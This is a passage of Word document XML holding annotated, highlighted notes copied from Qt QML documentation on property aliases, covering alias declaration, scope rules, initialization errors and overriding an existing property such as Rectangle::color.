        <w:t>Unlike an ordinary property definition, which allocates a new, unique storage space for the property, a property alias connects the newly declared property (called the aliasing property) as a direct reference to an existing property (the aliased property).</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A property alias declaration looks like an ordinary property definition, except that it requires the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>alias</w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>keyword</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of a property type, and the right-hand-side of the property declaration must be a valid alias reference:</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r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default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alias</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&lt;name&gt;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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>alias</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> reference</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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Unlike an ordinary property, an </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>alias can only refer to an object</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, or the property of an object, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>that is within the scope of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2747" w:history="1">
        <w:r w:rsidRPr="00E80CEE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>type</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>within which the alias is declared</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cannot contain arbitrary JavaScript expressions and it cannot refer to objects declared outside of the scope of its type</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Also note the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>alias reference</w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is not optional</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, unlike the optional default value for an ordinary property; the alias reference must be provided when the alias is first declared.</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For </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, below is a</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Button</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type with a</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buttonText</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aliased property which is connected to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text</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2748" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Text</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>child:</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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// Button.qml</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lastRenderedPageBreak/>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alias</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> buttonText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textItem</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text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30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"yellow"</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Text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id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textItem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The following code would create a</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Button</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with a defined text string for the child</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2749" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Text</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object: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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Button</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buttonText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"Click Me"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Here, modifying</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buttonText</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>directly modifies the textItem.text value; it does not change some other value that then updates textItem.text. If</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buttonText</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>was not an alias, changing its value would not actually change the displayed text at all, as property bindings are not bi-directional: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buttonText</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>value would have changed if textItem.text was changed, but not the other way around.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00AD6A27">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2501" w:name="considerations-for-property-aliases"/>
      <w:bookmarkStart w:id="2502" w:name="_Toc483001075"/>
      <w:bookmarkStart w:id="2503" w:name="_Toc483604410"/>
      <w:bookmarkStart w:id="2504" w:name="_Toc483605630"/>
      <w:bookmarkEnd w:id="2501"/>
      <w:r w:rsidRPr="00AD6A27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Considerations for Property Aliases</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2502"/>
      <w:bookmarkEnd w:id="2503"/>
      <w:bookmarkEnd w:id="2504"/>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80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Aliases are only activated once a component has been fully initialized</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. An </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>error is generated when an uninitialized alias is referenced</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Likewise, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aliasing an aliasing property will also result in an error</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>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alias</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> widgetLabel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label</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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//will generate an error</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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//widgetLabel.text: "Initial text"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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//will generate an error</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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>//property alias widgetLabelText: widgetLabel.text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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component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onCompleted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widgetLabel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text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"Alias completed Initialization"</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80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When importing a</w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2750" w:history="1">
        <w:r w:rsidRPr="00E80CEE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML object type</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with a property alias in the root object, however, the property appear as a regular Qt property and consequently can be used in alias references</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AD6A27">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> // indirect aliases of aliases are possible, if I understand well //</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It is </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>possible for an aliasing property to have the same name as an existing property</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, effectively overwriting the existing property. For </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the following QML type has a</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color</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>alias property, named the same as the built-in</w:t>
      </w:r>
      <w:r w:rsidR="00AD6A27">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2751" w:anchor="color-prop" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle::color</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AD6A27">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property:</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    id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coloredrectangle</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alias</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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bluerectangle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color</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"red"</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id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bluerectangle</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"#1234ff"</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Component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onCompleted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console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log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coloredrectangle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//prints "#1234ff"</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setInternalColor</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console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log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coloredrectangle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//prints "#111111"</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coloredrectangle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color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"#884646"</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console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log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coloredrectangle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//prints #884646</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//internal function that has access to internal properties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function</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> setInternalColor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color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"#111111"</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Any object that use this type and refer to its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color</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property will be referring to the alias rather than the ordinary</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2752" w:anchor="color-prop" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle::color</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property. Internally, however, the rectangle can correctly set its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color</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property and refer to the actual defined property rather than the alias.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00AD6A27">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2505" w:name="default-properties"/>
      <w:bookmarkStart w:id="2506" w:name="_Toc483001076"/>
      <w:bookmarkStart w:id="2507" w:name="_Toc483604411"/>
      <w:bookmarkStart w:id="2508" w:name="_Toc483605631"/>
      <w:bookmarkEnd w:id="2505"/>
      <w:r w:rsidRPr="00AD6A27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Default Properties</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2506"/>
      <w:bookmarkEnd w:id="2507"/>
      <w:bookmarkEnd w:id="2508"/>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80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
